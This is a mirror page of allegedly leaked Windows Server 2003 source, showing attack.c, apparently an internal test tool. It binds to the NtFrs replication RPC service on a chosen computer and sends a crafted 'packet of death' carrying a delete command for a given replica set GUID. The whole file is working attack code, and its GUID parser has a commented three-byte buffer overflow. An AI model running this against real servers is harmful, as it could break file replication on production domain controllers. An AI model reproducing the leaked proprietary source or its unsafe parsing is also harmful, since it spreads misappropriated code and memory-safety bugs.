archive
/
windows-server-2003
mirror of https://github.com/selfrender/Windows-Server-2003
2
0
Fork 0
Code Issues Projects Releases Wiki Activity
Leaked source code of windows server 2003
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
2 Commits
1 Branch
0 Tags
1.5 GiB
Tree: 7b07a90fc1
Branches Tags
${ item.name }
Create tag ${ searchTerm }
Create branch ${ searchTerm }
from '7b07a90fc1'
${ noResults }
windows-server-2003/ds/netapi/svcimgs/ntrepl/test/attackfrs/attack.c

802 lines
18 KiB
Raw Normal View History

commiting as it is
4 years ago
  2. #include <ntreppch.h>
  3. #include <frs.h>
  4. #include <frsrpc.h>
  5. #include "frsrpc_c.c"
  7. #include "attack.h"
  9. WCHAR* ProgramName = NULL;
  12. VOID
  13. StrToGuid(
  14. IN PCHAR s,
  15. OUT GUID *pGuid
  16. )
  17. /*++
  19. Routine Description:
  21. Convert a string in GUID display format to an object ID that
  22. can be used to lookup a file.
  24. based on a routine by Mac McLain
  26. Arguments:
  28. pGuid - ptr to the output GUID.
  30. s - The input character buffer in display guid format.
  31. e.g.: b81b486b-c338-11d0-ba4f0000f80007df
  33. Must be at least GUID_CHAR_LEN (35 bytes) long.
  35. Function Return Value:
  37. None.
  39. --*/
  40. {
  41. UCHAR Guid[sizeof(GUID) + sizeof(DWORD)]; // 3 byte overflow
  42. GUID *lGuid = (GUID *)Guid;
  45. sscanf(s, "%08lx-%04x-%04x-%02x%02x%02x%02x%02x%02x%02x%02x",
  46. &lGuid->Data1,
  47. &lGuid->Data2,
  48. &lGuid->Data3,
  49. &lGuid->Data4[0],
  50. &lGuid->Data4[1],
  51. &lGuid->Data4[2],
  52. &lGuid->Data4[3],
  53. &lGuid->Data4[4],
  54. &lGuid->Data4[5],
  55. &lGuid->Data4[6],
  56. &lGuid->Data4[7]);
  57. COPY_GUID(pGuid, lGuid);
  58. }
  62. VOID*
  63. MALLOC(size_t x) {
  64. VOID* _x;
  65. _x = malloc(x);
  66. if(_x == NULL){
  67. printf("Out of memory!!\n\n");
  68. exit(1);
  69. }
  71. ZeroMemory(_x, x);
  72. return(_x);
  73. }
  77. PVOID
  78. MIDL_user_allocate(
  79. IN size_t Bytes
  80. )
  81. /*++
  82. Routine Description:
  83. Allocate memory for RPC.
  85. Arguments:
  86. Bytes - Number of bytes to allocate.
  88. Return Value:
  89. NULL - memory could not be allocated.
  90. !NULL - address of allocated memory.
  91. --*/
  92. {
  93. return MALLOC(Bytes);
  94. }
  98. VOID
  99. MIDL_user_free(
  100. IN PVOID Buffer
  101. )
  102. /*++
  103. Routine Description:
  104. Free memory for RPC.
  106. Arguments:
  107. Buffer - Address of memory allocated with MIDL_user_allocate().
  109. Return Value:
  110. None.
  111. --*/
  112. {
  113. FREE(Buffer);
  114. }
  117. BindWithAuth(
  118. IN PWCHAR ComputerName, OPTIONAL
  119. OUT handle_t *OutHandle
  120. )
  121. /*++
  122. Routine Description:
  123. Bind to the NtFrs service on ComputerName (this machine if NULL)
  124. with authenticated, encrypted packets.
  126. Arguments:
  127. ComputerName - Bind to the service on this computer. The computer
  128. name can be any RPC-bindable name. Usually, the
  129. NetBIOS or DNS name works just fine. The NetBIOS
  130. name can be found with GetComputerName() or
  131. hostname. The DNS name can be found with
  132. gethostbyname() or ipconfig /all. If NULL, the
  133. service on this computer is contacted. The service
  134. is contacted using Secure RPC.
  135. OutHandle - Bound, resolved, authenticated handle
  137. Return Value:
  138. Win32 Status
  139. --*/
  140. {
  141. DWORD WStatus, WStatus1;
  142. DWORD ComputerLen;
  143. handle_t Handle = NULL;
  144. PWCHAR LocalName = NULL;
  145. PWCHAR PrincName = NULL;
  146. PWCHAR BindingString = NULL;
  148. try {
  149. //
  150. // Return value
  151. //
  152. *OutHandle = NULL;
  154. //
  155. // If needed, get computer name
  156. //
  157. if (ComputerName == NULL) {
  158. ComputerLen = MAX_COMPUTERNAME_LENGTH + 2;
  159. LocalName = malloc(ComputerLen * sizeof(WCHAR));
  161. if(LocalName == NULL) {
  162. WStatus = ERROR_NOT_ENOUGH_MEMORY;
  163. goto CLEANUP;
  164. }
  166. if (!GetComputerName(LocalName, &ComputerLen)) {
  167. WStatus = GetLastError();
  168. goto CLEANUP;
  169. }
  170. ComputerName = LocalName;
  171. }
  173. //
  174. // Create a binding string to NtFrs on some machine.
  175. WStatus = RpcStringBindingCompose(NULL, PROTSEQ_TCP_IP, ComputerName,
  176. NULL, NULL, &BindingString);
  178. if(!WIN_SUCCESS(WStatus)) {
  179. goto CLEANUP;
  180. }
  181. //
  182. // Store the binding in the handle
  183. //
  184. WStatus = RpcBindingFromStringBinding(BindingString, &Handle);
  185. if (!WIN_SUCCESS(WStatus)) {
  186. goto CLEANUP;
  187. }
  188. //
  189. // Resolve the binding to the dynamic endpoint
  190. //
  191. WStatus = RpcEpResolveBinding(Handle, frsrpc_ClientIfHandle);
  193. if (!WIN_SUCCESS(WStatus)) {
  194. goto CLEANUP;
  195. }
  197. //
  198. // Find the principle name
  199. //
  200. WStatus = RpcMgmtInqServerPrincName(Handle, RPC_C_AUTHN_GSS_NEGOTIATE, &PrincName);
  202. if (!WIN_SUCCESS(WStatus)) {
  203. goto CLEANUP;
  204. }
  205. //
  206. // Set authentication info
  207. //
  208. WStatus = RpcBindingSetAuthInfo(Handle,
  209. PrincName,
  210. RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
  211. RPC_C_AUTHN_GSS_NEGOTIATE,
  212. NULL,
  213. RPC_C_AUTHZ_NONE);
  215. if (!WIN_SUCCESS(WStatus)) {
  216. goto CLEANUP;
  217. }
  221. //
  222. // SUCCESS
  223. //
  224. *OutHandle = Handle;
  225. Handle = NULL;
  226. WStatus = ERROR_SUCCESS;
  228. CLEANUP:;
  229. } except (EXCEPTION_EXECUTE_HANDLER) {
  230. //
  231. // Exception (may be RPC)
  232. //
  233. WStatus = GetExceptionCode();
  234. }
  236. //
  237. // Clean up any handles, events, memory, ...
  238. //
  239. try {
  240. if (LocalName) {
  241. free(LocalName);
  242. }
  243. if (BindingString) {
  244. WStatus1 = RpcStringFreeW(&BindingString);
  245. }
  247. // Only update status if we have no errror so far.
  248. if(WIN_SUCCESS(WStatus)){
  249. WStatus = WStatus1;
  250. }
  252. if (PrincName) {
  253. WStatus1 = RpcStringFree(&PrincName);
  254. }
  257. // Only update status if we have no errror so far.
  258. if(WIN_SUCCESS(WStatus)){
  259. WStatus = WStatus1;
  260. }
  262. if (Handle) {
  263. WStatus1 = RpcBindingFree(&Handle);
  264. }
  266. // Only update status if we have no errror so far.
  267. if(WIN_SUCCESS(WStatus)){
  268. WStatus = WStatus1;
  269. }
  270. } except (EXCEPTION_EXECUTE_HANDLER) {
  271. //
  272. // Exception (may be RPC)
  273. //
  274. WStatus1 = GetExceptionCode();
  277. // Only update status if we have no errror so far.
  278. if(WIN_SUCCESS(WStatus)){
  279. WStatus = WStatus1;
  280. }
  281. }
  283. return WStatus;
  284. }
  288. BindWithNamedPipeNoAuth(
  289. IN PWCHAR ComputerName, OPTIONAL
  290. OUT handle_t *OutHandle
  291. )
  292. /*++
  293. Routine Description:
  294. Bind to the NtFrs service on ComputerName (this machine if NULL)
  295. with authenticated, encrypted packets.
  297. Arguments:
  298. ComputerName - Bind to the service on this computer. The computer
  299. name can be any RPC-bindable name. Usually, the
  300. NetBIOS or DNS name works just fine. The NetBIOS
  301. name can be found with GetComputerName() or
  302. hostname. The DNS name can be found with
  303. gethostbyname() or ipconfig /all. If NULL, the
  304. service on this computer is contacted. The service
  305. is contacted using Secure RPC.
  306. OutHandle - Bound, resolved, authenticated handle
  308. Return Value:
  309. Win32 Status
  310. --*/
  311. {
  312. DWORD WStatus, WStatus1;
  313. DWORD ComputerLen;
  314. handle_t Handle = NULL;
  315. PWCHAR LocalName = NULL;
  316. PWCHAR PrincName = NULL;
  317. PWCHAR BindingString = NULL;
  319. try {
  320. //
  321. // Return value
  322. //
  323. *OutHandle = NULL;
  325. //
  326. // If needed, get computer name
  327. //
  328. if (ComputerName == NULL) {
  329. ComputerLen = MAX_COMPUTERNAME_LENGTH + 2;
  330. LocalName = malloc(ComputerLen * sizeof(WCHAR));
  332. if(LocalName == NULL) {
  333. WStatus = ERROR_NOT_ENOUGH_MEMORY;
  334. goto CLEANUP;
  335. }
  337. if (!GetComputerName(LocalName, &ComputerLen)) {
  338. WStatus = GetLastError();
  339. goto CLEANUP;
  340. }
  341. ComputerName = LocalName;
  342. }
  344. //
  345. // Create a binding string to NtFrs on some machine.
  346. WStatus = RpcStringBindingCompose(NULL, PROTSEQ_NAMED_PIPE, ComputerName,
  347. NULL, NULL, &BindingString);
  349. if(!WIN_SUCCESS(WStatus)) {
  350. goto CLEANUP;
  351. }
  352. //
  353. // Store the binding in the handle
  354. //
  355. WStatus = RpcBindingFromStringBinding(BindingString, &Handle);
  356. if (!WIN_SUCCESS(WStatus)) {
  357. goto CLEANUP;
  358. }
  359. //
  360. // Resolve the binding to the dynamic endpoint
  361. //
  362. WStatus = RpcEpResolveBinding(Handle, frsrpc_ClientIfHandle);
  364. if (!WIN_SUCCESS(WStatus)) {
  365. goto CLEANUP;
  366. }
  368. //
  369. // Set authentication info
  370. //
  372. WStatus = RpcBindingSetAuthInfo(Handle,
  373. NULL,
  374. RPC_C_AUTHN_LEVEL_NONE,
  375. RPC_C_AUTHN_NONE,
  376. NULL,
  377. RPC_C_AUTHZ_NONE);
  379. if (!WIN_SUCCESS(WStatus)) {
  380. goto CLEANUP;
  381. }
  385. //
  386. // SUCCESS
  387. //
  388. *OutHandle = Handle;
  389. Handle = NULL;
  390. WStatus = ERROR_SUCCESS;
  392. CLEANUP:;
  393. } except (EXCEPTION_EXECUTE_HANDLER) {
  394. //
  395. // Exception (may be RPC)
  396. //
  397. WStatus = GetExceptionCode();
  398. }
  400. //
  401. // Clean up any handles, events, memory, ...
  402. //
  403. try {
  404. if (LocalName) {
  405. free(LocalName);
  406. }
  407. if (BindingString) {
  408. WStatus1 = RpcStringFreeW(&BindingString);
  409. }
  411. // Only update status if we have no errror so far.
  412. if(WIN_SUCCESS(WStatus)){
  413. WStatus = WStatus1;
  414. }
  416. if (PrincName) {
  417. WStatus1 = RpcStringFree(&PrincName);
  418. }
  421. // Only update status if we have no errror so far.
  422. if(WIN_SUCCESS(WStatus)){
  423. WStatus = WStatus1;
  424. }
  426. if (Handle) {
  427. WStatus1 = RpcBindingFree(&Handle);
  428. }
  430. // Only update status if we have no errror so far.
  431. if(WIN_SUCCESS(WStatus)){
  432. WStatus = WStatus1;
  433. }
  434. } except (EXCEPTION_EXECUTE_HANDLER) {
  435. //
  436. // Exception (may be RPC)
  437. //
  438. WStatus1 = GetExceptionCode();
  441. // Only update status if we have no errror so far.
  442. if(WIN_SUCCESS(WStatus)){
  443. WStatus = WStatus1;
  444. }
  445. }
  447. return WStatus;
  448. }
  450. BindWithNoAuth(
  451. IN PWCHAR ComputerName, OPTIONAL
  452. OUT handle_t *OutHandle
  453. )
  454. /*++
  455. Routine Description:
  456. Bind to the NtFrs service on ComputerName (this machine if NULL)
  457. with authenticated, encrypted packets.
  459. Arguments:
  460. ComputerName - Bind to the service on this computer. The computer
  461. name can be any RPC-bindable name. Usually, the
  462. NetBIOS or DNS name works just fine. The NetBIOS
  463. name can be found with GetComputerName() or
  464. hostname. The DNS name can be found with
  465. gethostbyname() or ipconfig /all. If NULL, the
  466. service on this computer is contacted. The service
  467. is contacted using Secure RPC.
  468. OutHandle - Bound, resolved, authenticated handle
  470. Return Value:
  471. Win32 Status
  472. --*/
  473. {
  474. DWORD WStatus, WStatus1;
  475. DWORD ComputerLen;
  476. handle_t Handle = NULL;
  477. PWCHAR LocalName = NULL;
  478. PWCHAR PrincName = NULL;
  479. PWCHAR BindingString = NULL;
  481. try {
  482. //
  483. // Return value
  484. //
  485. *OutHandle = NULL;
  487. //
  488. // If needed, get computer name
  489. //
  490. if (ComputerName == NULL) {
  491. ComputerLen = MAX_COMPUTERNAME_LENGTH + 2;
  492. LocalName = malloc(ComputerLen * sizeof(WCHAR));
  494. if(LocalName == NULL) {
  495. WStatus = ERROR_NOT_ENOUGH_MEMORY;
  496. goto CLEANUP;
  497. }
  499. if (!GetComputerName(LocalName, &ComputerLen)) {
  500. WStatus = GetLastError();
  501. goto CLEANUP;
  502. }
  503. ComputerName = LocalName;
  504. }
  506. //
  507. // Create a binding string to NtFrs on some machine.
  508. WStatus = RpcStringBindingCompose(NULL, PROTSEQ_TCP_IP, ComputerName,
  509. NULL, NULL, &BindingString);
  511. if(!WIN_SUCCESS(WStatus)) {
  512. goto CLEANUP;
  513. }
  514. //
  515. // Store the binding in the handle
  516. //
  517. WStatus = RpcBindingFromStringBinding(BindingString, &Handle);
  518. if (!WIN_SUCCESS(WStatus)) {
  519. goto CLEANUP;
  520. }
  521. //
  522. // Resolve the binding to the dynamic endpoint
  523. //
  524. WStatus = RpcEpResolveBinding(Handle, frsrpc_ClientIfHandle);
  526. if (!WIN_SUCCESS(WStatus)) {
  527. goto CLEANUP;
  528. }
  530. //
  531. // Set authentication info
  532. //
  534. WStatus = RpcBindingSetAuthInfo(Handle,
  535. NULL,
  536. RPC_C_AUTHN_LEVEL_NONE,
  537. RPC_C_AUTHN_NONE,
  538. NULL,
  539. RPC_C_AUTHZ_NONE);
  541. if (!WIN_SUCCESS(WStatus)) {
  542. goto CLEANUP;
  543. }
  547. //
  548. // SUCCESS
  549. //
  550. *OutHandle = Handle;
  551. Handle = NULL;
  552. WStatus = ERROR_SUCCESS;
  554. CLEANUP:;
  555. } except (EXCEPTION_EXECUTE_HANDLER) {
  556. //
  557. // Exception (may be RPC)
  558. //
  559. WStatus = GetExceptionCode();
  560. }
  562. //
  563. // Clean up any handles, events, memory, ...
  564. //
  565. try {
  566. if (LocalName) {
  567. free(LocalName);
  568. }
  569. if (BindingString) {
  570. WStatus1 = RpcStringFreeW(&BindingString);
  571. }
  573. // Only update status if we have no errror so far.
  574. if(WIN_SUCCESS(WStatus)){
  575. WStatus = WStatus1;
  576. }
  578. if (PrincName) {
  579. WStatus1 = RpcStringFree(&PrincName);
  580. }
  583. // Only update status if we have no errror so far.
  584. if(WIN_SUCCESS(WStatus)){
  585. WStatus = WStatus1;
  586. }
  588. if (Handle) {
  589. WStatus1 = RpcBindingFree(&Handle);
  590. }
  592. // Only update status if we have no errror so far.
  593. if(WIN_SUCCESS(WStatus)){
  594. WStatus = WStatus1;
  595. }
  596. } except (EXCEPTION_EXECUTE_HANDLER) {
  597. //
  598. // Exception (may be RPC)
  599. //
  600. WStatus1 = GetExceptionCode();
  603. // Only update status if we have no errror so far.
  604. if(WIN_SUCCESS(WStatus)){
  605. WStatus = WStatus1;
  606. }
  607. }
  609. return WStatus;
  610. }
  613. //
  614. // Contruct the packet that we will send
  615. //
  616. DWORD
  617. BuildPacketOfDeath(
  618. VOID **ppPacket,
  619. char* TargetGuid
  620. )
  621. {
  622. PCOMM_PACKET CommPkt = NULL;
  623. COMM_PKT_DESCRIPTOR BoP;
  624. COMM_PKT_DESCRIPTOR Pkt1, Pkt2, Pkt3, Pkt4, Pkt5, Pkt6;
  625. COMM_PKT_DESCRIPTOR EoP;
  626. ULONG Zero = 0;
  627. ULONG NullData = COMM_NULL_DATA;
  628. GUID Guid;
  629. ULONG Len;
  630. ULONG LenGuid;
  631. ULONG LenName;
  632. GNAME GName;
  633. PBYTE ReplicaData = NULL;
  634. PBYTE CopyTo = NULL;
  635. PVOID CopyFrom = NULL;
  636. ULONG CopyLen = 0;
  637. ULONG CmdDelete = CMD_DELETE;
  639. BoP.CommType = COMM_BOP;
  640. BoP.CommDataLength = sizeof(ULONG);
  641. BoP.ActualDataLength = sizeof(ULONG);
  642. BoP.Data = &Zero;
  643. BoP.Next = &Pkt2;
  645. Pkt2.CommType = COMM_COMMAND;
  646. Pkt2.CommDataLength = sizeof(ULONG);
  647. Pkt2.ActualDataLength = sizeof(ULONG);
  648. Pkt2.Data = &CmdDelete;
  649. Pkt2.Next = &Pkt1;
  651. GName.Guid = &Guid;
  653. StrToGuid(TargetGuid, GName.Guid);
  654. GName.Name = L"Fake Name";
  656. LenGuid = sizeof(GUID);
  657. LenName = (wcslen(GName.Name) + 1) * sizeof(WCHAR);
  658. Len = LenGuid + LenName + (2 * sizeof(ULONG));
  660. ReplicaData = MALLOC(sizeof(ULONG) + // Len
  661. sizeof(ULONG) + // LenGuid
  662. LenGuid + // GName.Guid
  663. sizeof(ULONG) + // LenName
  664. LenName // GName.Name
  665. );
  667. CopyTo = ReplicaData;
  669. CopyFrom = &LenGuid;
  670. CopyLen = sizeof(ULONG);
  671. CopyMemory(CopyTo, CopyFrom, CopyLen);
  672. CopyTo += CopyLen;
  674. CopyFrom = GName.Guid;
  675. CopyLen = LenGuid;
  676. CopyMemory(CopyTo, CopyFrom, CopyLen);
  677. CopyTo += CopyLen;
  679. CopyFrom = &LenName;
  680. CopyLen = sizeof(ULONG);
  681. CopyMemory(CopyTo, CopyFrom, CopyLen);
  682. CopyTo += CopyLen;
  684. CopyFrom = GName.Name;
  685. CopyLen = LenName;
  686. CopyMemory(CopyTo, CopyFrom, CopyLen);
  687. CopyTo += CopyLen;
  690. Pkt1.CommType = COMM_REPLICA;
  691. Pkt1.CommDataLength = sizeof(USHORT);
  692. Pkt1.ActualDataLength = Len;
  693. Pkt1.Data = ReplicaData;
  694. Pkt1.Next = &EoP;
  697. EoP.CommType = COMM_EOP;
  698. EoP.CommDataLength = sizeof(ULONG);
  699. EoP.ActualDataLength = sizeof(ULONG);
  700. EoP.Data = &NullData;
  701. EoP.Next = NULL;
  704. *ppPacket = BuildCommPktFromDescriptorList(&BoP,
  705. COMM_MEM_SIZE,
  706. NULL,
  707. NULL,
  708. NULL,
  709. NULL,
  710. NULL,
  711. NULL
  712. );
  715. return ERROR_SUCCESS;
  716. }
  718. DWORD
  719. MakeRpcCall(
  720. handle_t Handle,
  721. VOID* pPacket
  722. )
  723. {
  724. DWORD WStatus = ERROR_SUCCESS;
  726. try{
  727. WStatus = FrsRpcSendCommPkt(Handle, pPacket);
  728. } except(EXCEPTION_EXECUTE_HANDLER) {
  729. WStatus = GetExceptionCode();
  730. }
  732. return WStatus;
  733. }
  736. void
  737. Usage(
  738. void
  739. )
  740. {
  741. printf("\nUsage:\n\n");
  742. printf("%ws ReplicaSetGuid [TargetComputer]\n\n\n", ProgramName);
  744. }
  746. __cdecl
  747. main(
  748. int argc,
  749. char** Argv
  750. )
  751. {
  753. WCHAR* ComputerName = NULL;
  754. handle_t Handle;
  755. DWORD WStatus = ERROR_SUCCESS;
  756. VOID *pPacket = NULL;
  758. ProgramName = (WCHAR*) malloc((strlen(Argv[0]) + 1) * sizeof(WCHAR));
  759. wsprintf(ProgramName,L"%S",Argv[0]);
  760. if((argc > 3) || (argc < 2)) {
  761. Usage();
  762. exit(1);
  763. }
  765. if(strlen(Argv[1]) != 35) {
  766. printf("\nIncorrect guid format!\n\n");
  767. exit(1);
  768. }
  770. // A computer was name supplied
  771. if(argc == 3) {
  772. ComputerName = (WCHAR*) malloc((strlen(Argv[2]) + 1) * sizeof(WCHAR));
  773. wsprintf(ComputerName,L"%S", Argv[2]);
  774. }
  777. printf("Computer name = %ws\n", ComputerName);
  779. WStatus = BindWithAuth(ComputerName, &Handle);
  781. if(!WIN_SUCCESS(WStatus)){
  782. printf("Error binding: %d\n",WStatus);
  783. exit(1);
  784. } else {
  785. printf("Bind succeeded!\n");
  786. }
  788. WStatus = BuildPacketOfDeath(&pPacket, Argv[1]);
  790. if(!WIN_SUCCESS(WStatus)) {
  791. printf("Error building packet: %d\n",WStatus);
  792. exit(1);
  793. } else {
  794. printf("Packet built!\n");
  795. }
  797. WStatus = MakeRpcCall(Handle, pPacket);
  799. printf("Result of RPC call: %d (0x%08x)\n",WStatus, WStatus);
  802. }